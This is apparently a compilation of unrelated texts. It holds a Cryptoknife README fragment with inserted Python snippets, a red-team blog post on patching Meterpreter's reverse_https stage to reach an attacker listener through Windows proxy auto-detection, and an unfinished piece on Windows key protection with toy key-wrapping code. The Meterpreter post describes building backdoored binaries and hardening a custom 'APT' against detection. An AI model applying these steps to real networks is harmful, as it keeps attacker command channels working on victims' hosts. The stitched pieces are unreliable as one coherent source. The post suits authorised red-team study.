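    # CRC-32 is a checksum, not a cryptographic hash; mask to unsigned 32-bit
    report["crc32"] = "%08x" % (zlib.crc32(data) & 0xFFFFFFFF)
    return report
```

For a whole directory, the same function would simply be applied to each file's bytes, mirroring the drag-and-drop workflow.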
Note that if you change the bit-level, you need to re-click "Generate", since different bit-levels require different key lengths.

AES/Rijndael CBC
Blowfish CBC
Triple DES CBC
Twofish CBC

Utilities

System profile gives a listing of RAM, processor, attached drives, and IP addresses. It is also run on start-up. ASCII/HEX is the same conversion interface used by Packet Sender. Epoch/Date is a very common calculation used in development. Password Generator has various knobs to create a secure password.

System Profile
ASCII/HEX
Epoch/Date convert
Password Generator

Using Cryptoknife, an open-source utility which generates no network traffic, is a very safe way to generate a password.

Building

Cryptoknife uses these libraries:

https://www.cryptopp.com/
https://www.qt.io/download-open-source/

All the project files are statically linked to create a single executable on Windows. Mac uses dynamic linking since apps are just directories.

Sponsorships

Would you like your name or brand listed on this website? Please contact me for sponsorship opportunities.

License

GPL v2 or Later. Contact me if you require a different license.

Copyright

Cryptoknife is wholly owned and copyright © - @NagleCode - DanNagle.com - Cryptoknife.com

Link: https://github.com/dannagle/Cryptoknife
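An offline password generator of this kind is easy to sketch with Python's CSPRNG; the "knobs" shown here (length and a symbols toggle) are my assumption, the real tool's options may differ:

```python
import secrets
import string

SYMBOLS = "!@#$%^&*()-_=+"

def generate_password(length: int = 16, symbols: bool = True) -> str:
    """Generate a random password locally, with no network traffic."""
    alphabet = string.ascii_letters + string.digits
    if symbols:
        alphabet += SYMBOLS
    # secrets.choice draws from the OS CSPRNG, unlike random.choice
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

Because everything happens in-process, this has the same property the text highlights: no password material ever leaves the machine.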
Uploaded on 27 Apr. 2017 by Max Bazaliy, Vlad Putin, and Alex Hude
Juan Caillava, Pentester at Deloitte Argentina
May 4

A Meterpreter and Windows proxy case

Introduction

A few months ago, while I was testing a custom APT that I developed for attack simulations in an enterprise Windows environment that allows access to the Internet via a proxy, I found that the HTTPS staged Meterpreter payload was behaving unexpectedly. To tell the truth, at the beginning I was not sure whether it was a problem related to the in-memory Meterpreter injection my APT was doing, or something else. As the APT had to be prepared to deal with proxy environments, I had to find the exact problem and fix it. After a thorough analysis of the situation, I found that the Meterpreter payload I was using (windows/meterpreter/reverse_https, Framework version 4.12.40-dev) was not working properly.

Before starting with the technical details, here is the testing environment:

Victim OS / IP: Windows 8.1 x64 Enterprise / 10.x.x.189
Internet access: via an authenticated proxy ("Automatically detect settings" IE configuration / DHCP option)
Proxy socket: 10.x.x.20:8080
External IP via proxy: 190.x.x.x
Attacker machine: 190.y.y.y
Meterpreter payload: windows/meterpreter/reverse_https

Note: as a reminder, the reverse_https payload is a staged one. That is, the first code executed on the victim machine downloads and injects in memory (via reflective injection) the actual Meterpreter DLL code (metsrv.x86.dll or metsrv.x64.dll).

The following screenshot shows the external IP of the victim machine. The next one shows the proxy configuration ("Automatically detect settings") of the victim machine. The following screenshot shows the use of "autoprox.exe" on the victim machine; observe that a proxy configuration was obtained via DHCP (option 252). In the above image it can be observed that, for "www.google.com", the proxy 10.x.x.20:8080 has to be used.
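The PAC file pointed to by DHCP option 252 encodes this rule as JavaScript, but during recon it is often enough to list every proxy the rules could ever return. A minimal sketch (it does not evaluate FindProxyForURL(), it only scrapes the PROXY directives):

```python
import re

def proxies_from_pac(pac_source: str):
    """List the PROXY host:port directives found in a wpad.dat / PAC file."""
    tokens = re.findall(r"PROXY\s+([\w.\-]+:\d+)", pac_source)
    # de-duplicate while preserving the order of first appearance
    seen = set()
    return [t for t in tokens if not (t in seen or seen.add(t))]
```

Running this over the downloaded wpad.dat would immediately surface the 10.x.x.20:8080 socket without needing autoprox.exe.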
This can also be learnt by manually downloading and inspecting the rules contained in the wpad.dat file (its location was provided via DHCP option 252). Note: according to my analysis, autoprox.exe (by pierrelc@microsoft.com) uses the Windows API to search first for the proxy settings received via DHCP and, if that fails, it then searches for proxy settings that can be obtained via DNS.

Analysis

During the analysis of the problem, I will be changing a few lines of code of the Meterpreter payload and testing it on the victim machine, so it is necessary to create a backdoored binary with a staged reverse HTTPS Meterpreter payload (windows/meterpreter/reverse_https) or to use a web delivery module. Whichever you choose is fine. Note: a simple backdoored binary can be created with Shellter and any trusted binary such as putty.exe; otherwise, use the Metasploit web delivery payload with PowerShell. Remember that we will be modifying the stage payload and not the stager, so you only need to create one backdoored binary for the whole experiment.

Let's execute the backdoored binary on the victim machine and observe what happens in the Metasploit listener running on the attacker machine. The following screenshot shows the MSF handler running on the attacker machine (port 443), and then a connection established with the victim machine (source port 18904). In the above image, it can be observed that the victim machine reaches the handler and we supposedly get a Meterpreter shell. However, it was impossible to get a valid answer for any command I entered, and then the session closed.

From a high-level perspective, when the stager payload (a small piece of code) is executed on the victim machine, it connects back to the listener to download a bigger piece of code (the stage Meterpreter payload), injects it in memory and hands control over to it.
The loaded Meterpreter payload then connects again to the listener, allowing interaction with the affected system. From what we can see so far, the stager was successfully executed and was able to reach the listener through the proxy. However, once the stage payload was injected (if that even worked), something goes wrong and the session dies.

Note: in case you are wondering, the AV was checked and no detection was observed. Also, in case the network administrator had decided to inspect the HTTPS content, I manually created a PEM certificate, configured the listener to use it, and then compared the fingerprint of that certificate against the fingerprint shown by the browser when the Metasploit listener was visited manually, to make sure the certificate was not being replaced in transit. This motivated me to continue looking for the problem elsewhere.

The next, perhaps obvious, step is to sniff the traffic from the victim machine to understand more about what is happening (from a black-box perspective). The following screenshot shows the traffic captured with Wireshark on the victim machine. In it, a TCP connection can be observed between the victim machine (10.x.x.189) and the proxy server (10.x.x.20:8080), where a CONNECT method is sent (first packet) from the victim asking for a secure communication (SSL/TLS) with the attacker machine (190.x.x.x:443). In addition, observe the NTLM authentication used in the request (NTLMSSP_AUTH) and the response from the proxy server, a "Connection established" (HTTP/1.1 200). After that, an SSL/TLS handshake took place. It is worth mentioning that the above image shows the traffic sent and received during the first part, that is, when the stager payload was executed.
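The fingerprint comparison described in the note above can be scripted once the listener's certificate and the one observed on the wire are both available in DER form; a small sketch (function names are mine):

```python
import hashlib

def fingerprint(der_bytes: bytes) -> str:
    """SHA-256 fingerprint of a DER-encoded certificate, in the
    colon-separated form browsers display."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def same_certificate(local_der: bytes, observed_der: bytes) -> bool:
    """True when the certificate seen on the wire matches the one we
    configured on the listener, i.e. nothing replaced it in transit."""
    return fingerprint(local_der) == fingerprint(observed_der)
```

A mismatch here would point to an interception device re-signing the TLS session, which is exactly what the manual browser check was ruling out.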
After the connection is established, a classic SSL/TLS handshake is performed between the two ends (the client and the server), and then, within the encrypted channel, the stage payload is transferred from the attacker machine to the victim. Now that we have confirmed that the first part (staging) of the Meterpreter "deployment" works, what follows is to understand what is happening in the second part, that is, the communication between the stage payload and the listener. To do that, we just need to continue analyzing the traffic captured with Wireshark.

The following screenshot shows what would be the last part of the communication between the stager payload and the listener, and then an attempt to reach the attacker machine directly from the victim (without using the proxy). In the first 5 packets, we can see the TCP connection termination phase (FIN,ACK; ACK; FIN,ACK; ACK) between the victim machine (10.x.x.189) and the proxy server (10.x.x.20). Then, it can be observed that the 6th packet contains a TCP SYN flag (to initiate a TCP handshake) sent from the victim machine to the attacker machine directly, that is, without using the proxy server as intermediary. Finally, observe the 7th packet received by the victim machine from the gateway, indicating that the destination (the attacker machine) is not directly reachable from this network (remember that a proxy server is required to reach the Internet).

So, after observing this traffic capture and seeing that the Meterpreter session died, we can conclude that the Meterpreter stage payload was unable to reach the listener because, for some reason, it tried to reach it directly, that is, without using the system proxy server the way the stager did. What we are going to do now is download the Meterpreter source code and try to understand the root cause of this behavior.
To do this, we should follow the "Building - Windows" guide published in the Rapid7 GitHub (see the references for a link). As suggested by the guide, we can use Visual Studio 2013 to open the project solution file (\metasploit-payloads\c\meterpreter\workspace\meterpreter.sln) and start exploring the source code. After exploring the code, we can observe that the "server_transport_winhttp.c" source file implements the proxy-settings logic (please see the references to locate the source file quickly). The following screenshot shows part of the code where the proxy setting is evaluated by Meterpreter.

As I learnt from the Meterpreter reverse_https related threads on GitHub, it will first try to use the WinHTTP Windows API to access the Internet, and in this portion of code we are seeing exactly that. As we can see, the code has plenty of dprintf calls that are used for debugging purposes and that will provide valuable information during our runtime analysis. To make the debugging information available to us, we have to modify the DEBUGTRACE pre-processor constant in the common.h header file, which makes the server (the Meterpreter DLL loaded in the victim) produce debug output that can be read using Visual Studio's Output window, DebugView from Sysinternals, or WinDbg.

The following screenshot shows the original DEBUGTRACE constant commented out in the common.h source code file, and the next one shows the required modification to obtain debugging information. Now, it is time to build the solution and copy the resulting "metsrv.x86.dll" binary saved at "\metasploit-payloads\c\meterpreter\output\x86\" to the attacker machine (where the Metasploit listener is), to the corresponding path (in my case, /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-payloads-1.1.26/data/meterpreter/).
On the debugging machine, let's run the DebugView program and then execute the backdoored binary again to get the Meterpreter stager running. The following screenshot shows the debugging output produced on the victim machine. From the debugging information (logs) generated by Meterpreter, it can be observed that lines 70 through 74 correspond to lines 48 through 52 of the server_transport_winhttp.c source file, where the dprintf sentences are. In particular, line 71 ("[PROXY] AutoDetect: yes") indicates that the proxy "AutoDetect" setting was found on the victim machine. However, the proxy URL obtained was NULL. Finally, after that, it can be observed that the stage tried to send a GET request (on line 75).

Thanks to the debugging output generated by Meterpreter, we are now closer to the root of the problem. It looks like the piece of code that handles the Windows proxy settings is not properly implemented. To solve the problem, we have to analyze the code, modify it and test it. As building the Meterpreter C solution multiple times, copying the resulting metsrv DLL to the attacker machine and testing it against the victim is too time-consuming, I thought it would be easier and less painful to replicate the proxy-handling piece of code in Python (ctypes to the rescue) and modify it as many times as needed on the victim machine.

The following is, more or less, the Meterpreter proxy code found in the analyzed version of the server_transport_winhttp.c source file, but written in Python. The following screenshot shows the execution of the script on the victim machine. The output of the script shows the same information that was obtained in the debugging logs: the proxy auto-configuration setting was detected, but no proxy address was obtained. If you check the code again you will realize that the DHCP and DNS possibilities are within the "if" block that evaluates the auto-configuration URL (ieConfig.lpszAutoConfigUrl).
However, this block is not executed if only the AutoDetect option is enabled, and that is exactly what is happening on this particular victim machine. In this scenario, the proxy configuration is obtained via DHCP through option 252. The following screenshot shows DHCP transaction packets sniffed on the victim machine. Observe that the DHCP answer from the server contains option 252 (Private/Proxy autodiscovery) with the URL that should be used to obtain information about the proxy. Remember that this is what we obtained before using the autoprox.exe tool.

Before continuing, it is important to understand the three alternatives that Windows provides for proxy configuration:

Automatically detect settings: use the URL obtained via DHCP (option 252) or request the WPAD hostname via DNS, LLMNR or NBNS (if enabled).
Use automatic configuration script: download the configuration script from the specified URL and use it to determine when to use proxy servers.
Proxy server: a manually configured proxy server for different protocols.

So, now that we have more precise information about the root cause, I will slightly modify the code to specifically consider the Auto Detect possibility. Let's first do it in Python, and if it works then update the Meterpreter C code and build the payload. The following is the modified Python code; observe that it now considers the possibility of a proxy configured via DHCP/DNS. Let's run it and see how it behaves. The following screenshot shows the output of the modified Python code run on the victim machine. Observe that it successfully detected the proxy configuration obtained via DHCP and shows the exact same proxy we observed at the beginning of this article (10.x.x.20).
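The article's modified script is only shown as a screenshot, so the following is a reconstruction of the idea rather than the author's exact code: read the IE proxy config with ctypes and derive the auto-detect flags that WinHttpGetProxyForUrl would need, honouring AutoDetect even when no config URL is present (the missing case). The flag values come from winhttp.h; the helper name is mine, and the ctypes part only runs on Windows:

```python
import ctypes
import sys

# Auto-proxy flag values from winhttp.h
WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002
WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002

def autoproxy_options(auto_detect: bool, auto_config_url):
    """Derive the (flags, detect_flags) pair for WinHttpGetProxyForUrl."""
    flags = detect = 0
    if auto_detect:
        flags |= WINHTTP_AUTOPROXY_AUTO_DETECT
        detect = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
    if auto_config_url:
        flags |= WINHTTP_AUTOPROXY_CONFIG_URL
    return flags, detect

if sys.platform == "win32":
    class WINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):
        _fields_ = [("fAutoDetect", ctypes.c_int),
                    ("lpszAutoConfigUrl", ctypes.c_wchar_p),
                    ("lpszProxy", ctypes.c_wchar_p),
                    ("lpszProxyBypass", ctypes.c_wchar_p)]

    winhttp = ctypes.windll.winhttp
    cfg = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
    if winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(cfg)):
        print("AutoDetect:   ", bool(cfg.fAutoDetect))
        print("AutoConfigUrl:", cfg.lpszAutoConfigUrl)
        print("Proxy:        ", cfg.lpszProxy)
        print("Autoproxy flags:",
              autoproxy_options(bool(cfg.fAutoDetect), cfg.lpszAutoConfigUrl))
```

With only AutoDetect enabled (this article's victim), the helper still yields the AUTO_DETECT flag plus both DHCP and DNS detect types, which is precisely the branch the original code skipped.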
Now that we know that this code works, let's update the Meterpreter C source code (server_transport_winhttp.c) and test it with our backdoored binary. The following extract shows the updated piece of the Meterpreter source code; the updated portion can be seen in the dark grey zone. After modifying it, build the solution again, copy the resulting metsrv Meterpreter DLL to the listener machine and run the listener again to wait for the client. The following screenshot shows the listener running on the attacker machine. Observe how it was possible to successfully obtain a Meterpreter session when the victim machine uses the proxy "Auto Detect" configuration (DHCP option 252 in this case).

Problem root cause

Now, it is time to discuss something you may have wondered about when reading this article: why was the stager able to reach the attacker machine in the first place? What is the difference between the stager payload and the stage one in terms of communications? To answer those questions, we first need to understand how Meterpreter works at the time of this writing. Let's start at the beginning: the Windows API provides two mechanisms or interfaces to communicate via HTTP(S): WinInet and WinHTTP. In the context of Meterpreter, there are two features that are interesting for us in the HTTPS communication layer:

The ability to validate the certificate presented by the HTTPS server (the Metasploit listener running on the attacker machine) to prevent content inspection by agents such as L7 network firewalls. In other words, we want to perform certificate pinning.
The ability to transparently use the current user's proxy configuration to be able to reach the listener through the Internet.
It turns out that both features cannot be found in the same Windows API, that is:

WinInet: is transparently proxy aware, which means that if the current user's system proxy configuration works for Internet Explorer, then it works for WinInet-powered applications. It does not provide mechanisms to perform a custom validation of an SSL/TLS certificate.

WinHTTP: allows a custom verification of the SSL certificate presented by a server to be implemented trivially. It does not use the current user's system proxy configuration transparently.

Now, in terms of Meterpreter, there are two different stager payloads that can be used:

The reverse_https Meterpreter payload uses the WinInet Windows API, which means it cannot perform certificate validation, but it will use the system proxy transparently. That is, if the user can access the Internet via IE, then the stager can also do it.

The reverse_winhttps Meterpreter payload uses the WinHTTP Windows API, which means it can perform certificate validation, but the system proxy has to be "used" manually.

The Meterpreter payload itself (the stage payload) uses the WinHTTP Windows API by default and falls back to WinInet in case of error (see the documentation to understand a particular error condition with old proxy implementations), except if the user decided to use "paranoid mode", because WinInet would not be able to validate the certificate, and this is considered a priority.

Note: in the Meterpreter context, "paranoid mode" means that the SSL/TLS certificate HAS to be verified, and if it was replaced on the wire (e.g. by a Palo Alto Networks firewall inspecting the content), then the stage should not be downloaded and therefore the session should not be initiated. If the user requires "paranoid mode" for a particular scenario, then the stager will have to use WinHTTP. Now we have enough background to understand why we faced this problem.
I was using the reverse_https Meterpreter payload (without caring about "paranoid mode" for testing purposes), which means that the stager used the WinInet API to reach the listener; that is, it was transparently using the current user's proxy configuration, which was working properly. However, as the Meterpreter stage payload uses the WinHTTP API by default, and that code has, according to my criteria, a bug, it was not able to reach back to the listener on the attacker machine. I think this answers both questions.

Proxy identification approach

Another question that we didn't answer is: what would be the best approach to obtain the current user's proxy configuration when using the WinHTTP Windows API? To answer it, we need to find out what the precedence is when more than one proxy is configured on the system, and what Windows does when one option is not working (does it try another option?). According to what I found, the proxy settings in the Internet Options configuration dialog box are presented in the order of their precedence: first, the "Automatically detect settings" option is checked, next the "Use automatic configuration script" option, and finally the "Use a proxy for your LAN…" option. In addition, sample code for using the WinHTTP API can be found in the "Developer code sample" section of Microsoft MSDN, which states:

// Begin processing the proxy settings in the following order:
// 1) Auto-Detect if configured.
// 2) Auto-Config URL if configured.
// 3) Static Proxy Settings if configured

This suggests the same order of precedence we already mentioned.

Fault-tolerant implementation

One last question is what happens if a host is configured with multiple proxy options and the one with precedence is not working. Will Windows continue with the next option until it finds one that works?
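A fault-tolerant client can implement that precedence walk itself, probing each candidate and falling through on failure. A minimal sketch of the idea (function and parameter names are mine; the probe is injected as a callable so the logic stays testable):

```python
def resolve_proxy(auto_detect_proxy, script_proxy, static_proxy, is_working):
    """Walk the three Windows proxy sources in precedence order and return
    (source, proxy) for the first one that actually works, or None.

    Each *_proxy argument is the "host:port" that source yielded (or None
    when the source produced nothing); is_working(proxy) probes a proxy.
    """
    for source, proxy in (("auto-detect", auto_detect_proxy),
                          ("config-script", script_proxy),
                          ("static", static_proxy)):
        if proxy and is_working(proxy):
            return source, proxy
    return None  # no usable proxy at all
```

This is exactly the behavior the lab scenarios below test for in Windows itself: try auto-detect, then the configuration script, then the static setting, but keep going when one fails.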
To answer it, we could perform a little experiment, or spend hours and hours reversing the Windows components involved (mainly wininet.dll), so let's start with the experiment, which will surely be less time-consuming.

Lab settings

To further analyze the Windows proxy settings and capabilities, I created a lab environment with the following features:

A Windows domain with one Domain Controller
Domain: lab.bransh.com
DC IP: 192.168.0.1
DHCP service (192.168.0.100-150)

Three Microsoft Forefront TMG (Threat Management Gateway) servers
tmg1.lab.bransh.com: 192.168.0.10
tmg2.lab.bransh.com: 192.168.0.11
tmg3.lab.bransh.com: 192.168.0.12
Every TMG server has two network interfaces: the "internal" interface (range 192.168.0.x) is connected to the domain and allows clients to reach the Internet through it; the "external" interface is connected to a different network and is used by the proxy to get direct Internet access.

A Windows client (Windows 8.1 x64)
IP via DHCP
Proxy configuration:
Via DHCP (option 252): tmg1.lab.bransh.com
Via script: http://tmg2.lab.bransh.com/wpad.dat
Manual: tmg3.lab.bransh.com:8080
The client cannot directly reach the Internet
Firefox is configured to use the system proxy

The following screenshot shows the proxy settings configured in the Windows client host, and the next one shows the proxy set via DHCP using option 252. Note: the "Automatically detect settings" option can find the proxy settings either via DHCP or via DNS; when using the Windows API, it is possible to specify which one is desired, or both. By means of simple code that uses the API provided by Windows, it is possible to test a few proxy scenarios. Again, I wrote the code in Python, as it is very easy to modify and run without the need to compile C/C++ code on the testing machine every time a modification is needed.
However, you can do it in the language you prefer. The code has two important functions:

GetProxyInfoList(pProxyConfig, target_url): this function evaluates the proxy configuration for the current user and returns a list of proxy network sockets (IP:PORT) that could be used for the specified URL. It is important to remark that the list contains proxy addresses that could potentially be used to access the URL; it does not mean that the proxy servers are actually working. For example, the list could contain the proxy read from a WPAD.DAT file that was specified via the "Use automatic configuration script" option, but the proxy may not be available when trying to access the target URL.

CheckProxyStatus(proxy, target_server, target_port): this function tests a proxy against a target server and port (using the root resource URI: /) to verify whether the proxy actually provides access to the resource. This function helps decide whether a proxy, when more than one is available, can be used or not.

Testing scenario #1

In this scenario, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled after the client machine started. This means that the only option for the client machine to access the Internet is through the proxy server tmg3. The following screenshot shows the output of the script, along with how IE and Firefox deal with the situation. The testing script shows the following:

The option "Automatically detect settings" is enabled and the obtained proxy is "192.168.0.10:8080" (Windows downloaded the WPAD.DAT file in the background and cached the obtained configuration before the proxy's internal interface was disabled). However, the proxy is not working: as the internal interface of tmg1 was disabled, it was not possible to actually reach it through the network (a timeout was obtained).
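The original CheckProxyStatus code is only shown as a screenshot, but its idea can be sketched with a raw CONNECT probe (this version is my illustration; unlike the lab's TMG proxies, it attempts no NTLM authentication):

```python
import socket

def check_proxy_status(proxy_host, proxy_port, target_host, target_port,
                       timeout=5.0):
    """Probe a proxy: open TCP to it, issue a CONNECT for the target
    socket, and report whether the proxy answers with a 2xx status."""
    try:
        sock = socket.create_connection((proxy_host, proxy_port),
                                        timeout=timeout)
    except OSError:
        return False  # proxy itself unreachable (the timeout cases below)
    try:
        request = "CONNECT {0}:{1} HTTP/1.1\r\nHost: {0}:{1}\r\n\r\n".format(
            target_host, target_port)
        sock.sendall(request.encode("ascii"))
        status_line = sock.recv(1024).decode("ascii", "replace").split("\r\n", 1)[0]
        parts = status_line.split()
        # e.g. "HTTP/1.1 200 Connection established" -> True,
        #      "HTTP/1.1 502 Bad Gateway" -> False
        return len(parts) >= 2 and parts[1].startswith("2")
    except OSError:
        return False
    finally:
        sock.close()
```

Note that this distinguishes the two failure modes seen in the scenarios: an unreachable proxy (connection error or timeout) and a reachable proxy that answers 502 because its external leg is down.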
The option "Use automatic configuration script" is enabled and the obtained proxy is "192.168.0.11:8080" (Windows downloaded the WPAD.DAT file in the background and cached the obtained configuration before the proxy's internal interface was disabled). However, the proxy is not working: as the internal interface of tmg2 was disabled, it was not possible to actually reach it through the network (a timeout was obtained).

The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was successfully used and it was possible to send a request through it.

Observe that neither IE nor Firefox was able to reach the Internet with the presented configuration. However, a custom application that uses tmg3 as a proxy server would be able to do it successfully.

Testing scenario #2

In this scenario, very similar to #1, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled before the client machine started. This means that the only option for the client machine to access the Internet is through the proxy server tmg3. The following screenshot shows the output of the script, along with how IE and Firefox deal with the situation. When running our testing code, we can observe the following:

The option "Automatically detect settings" is enabled (tmg1.lab.bransh.com/wpad.dat), but no proxy was obtained. This occurred because the proxy server (tmg1) was not reachable when the host received the DHCP configuration (and option 252 in particular), so it was not able to download the wpad.dat proxy configuration file.

The option "Use automatic configuration script" is enabled and the provided URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". However, it was not possible to download the configuration script because the server is not reachable.

The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was successfully used and it was possible to send a request through it.
Observe that IE was able to understand the configuration and reach the Internet; however, Firefox was not.

Testing scenario #3

In this scenario, the internal network interface (192.168.0.11) of the proxy server TMG2 was disabled before the client machine started. This means that client machines can access the Internet through proxy servers TMG1 and TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deal with the situation.

When running our testing code, we can observe the following:

The option "Automatically detect settings" is enabled and it is possible to access the Internet through the obtained proxy (192.168.0.10:8080).

The option "Use automatic configuration script" is enabled and the provided URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". However, as the network interface of this proxy was disabled, it was not possible to download the configuration script.

The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy was successfully used and it was possible to send a request through it.

In addition, observe that IE was able to understand the configuration and reach the Internet; however, Firefox was not.

Testing scenario #4

In this scenario, only the internal network interface (192.168.0.11) of the proxy server TMG2 is enabled. When running our testing code, we can observe the following:

The option "Automatically detect settings" is enabled and it is not possible to access the Internet through the proxy (192.168.0.10:8080).

The option "Use automatic configuration script" is enabled and the provided URL for the configuration file is "tmg2.lab.bransh.com/wpad.dat". In addition, the obtained proxy is 192.168.0.11:8080 and it is possible to reach the Internet using it.

The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy is not reachable and a TIMEOUT is obtained.

In addition, observe that IE was not able to understand the configuration and reach the Internet.
However, Firefox successfully used the configuration and got access to the Internet.

Testing scenario #5

In this scenario, the internal network interfaces of all three proxy servers are enabled; however, the external interfaces of the servers TMG1 and TMG2 were disabled. When running our testing code, we can observe the following:

The option "Automatically detect settings" is enabled and the specified proxy (192.168.0.10:8080) is reachable. However, it answers with an error (status code 502) indicating that it is not possible to reach the Internet through it.

The option "Use automatic configuration script" is also enabled and the specified proxy (192.168.0.11:8080) is reachable. However, it answers with an error (status code 502) indicating that it is not possible to reach the Internet through it.

The manually configured proxy server is "tmg3.lab.bransh.com:8080". This proxy is reachable and it does provide access to the Internet.

Observe that neither IE nor Firefox was able to access the Internet. However, a custom application that uses TMG3 as a proxy server would be able to do so.

Conclusion

In certain scenarios, like the one exposed in the first part of this post, we will find that our favorite tool does not behave as expected. In those situations we have mainly two options: try to find another solution, or get our hands dirty and make it work. For the particular enterprise scenario I described, the fix applied to Meterpreter worked properly, and after compiling its DLL it was possible to make it work using the proxy configuration described. I'm not sure if this fix will be applied to the Meterpreter code, but if you find yourself in a situation like this, now you know what to do.

On the other hand, we saw that Windows tries to use the proxy configurations in order (according to the precedence we already discussed). However, it seems that once a proxy has been obtained (e.g. scenario #1), if it does not work, Windows does not try to use another available option.
Also, we saw that Internet Explorer and Firefox, when configured to "Use system proxy settings", do not behave in the same way when looking for a proxy. Finally, we also saw that in both cases, when a proxy is reachable but does not provide Internet access for any reason (e.g. the Internet link died), they will not try a different one that might work.

Considering the results, we can see that we do have the necessary API functions to evaluate all the proxy configurations and even test them to see if they actually allow access to an Internet resource. Therefore, with a few more lines of code we could make our APT solution more robust so that it works even in these kinds of scenarios. However, I have to admit that these are very uncommon scenarios, where a client workstation has more than one proxy configured, and I can't really see why an administrator would end up with this kind of mess. On the other hand, I'm not completely sure it would be a good idea to make our APT work even when IE does not: if a host that is believed to be disconnected from the Internet suddenly starts showing Internet activity by cleverly using the available proxies, that may look strange to a blue team.

As a final conclusion, I would say that making our APT solution as robust as IE would be enough to make it work in most cases. If IE is able to reach the Internet, then the APT will be as well.
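The fallback behaviour that Windows lacks here, trying each discovered proxy in precedence order and moving on when one fails, is straightforward to add on top of such checks. A hypothetical sketch (the function and parameter names are illustrative, not from the article's code):

```python
def select_working_proxy(candidates, check):
    """Return the first proxy for which `check(proxy)` succeeds.

    `candidates` is an ordered list of proxies, highest precedence first
    (e.g. auto-detect result, auto-config script result, manual setting).
    `check` is a probe such as a CheckProxyStatus-style function.
    Returns None when no proxy works, mirroring a host with no usable
    route to the Internet.
    """
    for proxy in candidates:
        if check(proxy):
            return proxy
    return None
```

With this, scenario #1 would succeed: the two cached-but-dead WPAD proxies fail the probe and the manually configured tmg3 is selected.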
References

Auto Proxy: https://blogs.msdn.microsoft.com/askie/2014/02/07/optimizing-performance-with-automatic-proxy-configuration-scripts-pac/
Windows Web Proxy Configuration: https://blogs.msdn.microsoft.com/ieinternals/2013/10/11/understanding-web-proxy-configuration/
Meterpreter building: https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter
Meterpreter WinHTTP source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_winhttp.c
Meterpreter common.h source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/common/common.h
Sysinternals DebugView: https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
WinHTTP vs WinInet: https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers
Metasploit bug report: https://github.com/rapid7/metasploit-payloads/issues/151
WinHTTP Sample Code: http://code.msdn.microsoft.com/windowsdesktop/WinHTTP-proxy-sample-eea13d0c

Source: https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1
How to keep a secret in Windows

Protecting cryptographic keys is always a balancing act. For the keys to be useful they need to be readily accessible and recoverable, and their use needs to be sufficiently performant that it does not slow your application down. On the other hand, the more accessible and recoverable they are, the less secure they are.

In Windows, we tried to build a number of systems to help with these problems. The most basic was the Windows Data Protection API (DPAPI). It was our answer to the question: "What secret do I use to encrypt a secret?" It can be thought of as a policy or DRM system, since as a practical matter it is largely a speed bump for privileged users who want access to the data it protects. Over the years there have been many tools that leverage the user's permissions to decrypt DPAPI-protected data; one of the most recent is DPAPIPick. Even though I have framed this problem in the context of Windows, here is a neat paper on this broad problem called "Playing hide and seek with stored keys".

The next level of key protection offered by Windows is a policy mechanism called "non-exportable keys", which is primarily a consumer of DPAPI. Basically, when you generate the key you ask Windows to deny its export; as a result the key gets a flag set on it that cannot be changed via the API. The key and this flag are then protected with DPAPI. Even though this is just a policy enforced with a DRM-like system, it does serve its purpose, reducing the casual copying of keys. Again, over the years there have been numerous tools that have leveraged the user's permissions to access these keys; one of the more recent I remember was called Jailbreak (https://github.com/iSECPartners/jailbreak-Windows). There have also been a lot of wonderful walkthroughs of how these systems work, for example this nice NCC Group presentation.

The problem with all of the above mechanisms is that they are largely designed to protect keys from their rightful user.
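The "what secret encrypts a secret" chain that DPAPI answers can be illustrated with a toy key-wrapping scheme. To be clear, this is not DPAPI's actual construction (DPAPI derives its master key from the user's logon credential and uses the Windows crypto providers); it is a self-contained stand-in that shows the layering: a key-encryption key derived from a user secret wraps the data key, so the data key never has to be stored in the clear.

```python
import hashlib
import hmac
import os


def _keystream(key, n):
    """Expand `key` into n pseudo-random bytes (toy counter-mode stream)."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def wrap_key(data_key, user_secret, salt=None):
    """Encrypt `data_key` under a KEK derived from `user_secret`."""
    salt = salt or os.urandom(16)
    kek = hashlib.pbkdf2_hmac("sha256", user_secret, salt, 100_000)
    stream = _keystream(kek, len(data_key))
    ct = bytes(a ^ b for a, b in zip(data_key, stream))
    # Authenticate the blob so tampering or a wrong secret is detected.
    tag = hmac.new(kek, salt + ct, hashlib.sha256).digest()
    return salt + ct + tag


def unwrap_key(blob, user_secret, key_len=32):
    """Recover the data key, raising ValueError on a wrong secret."""
    salt, ct, tag = blob[:16], blob[16:16 + key_len], blob[16 + key_len:]
    kek = hashlib.pbkdf2_hmac("sha256", user_secret, salt, 100_000)
    expected = hmac.new(kek, salt + ct, hashlib.sha256).digest()
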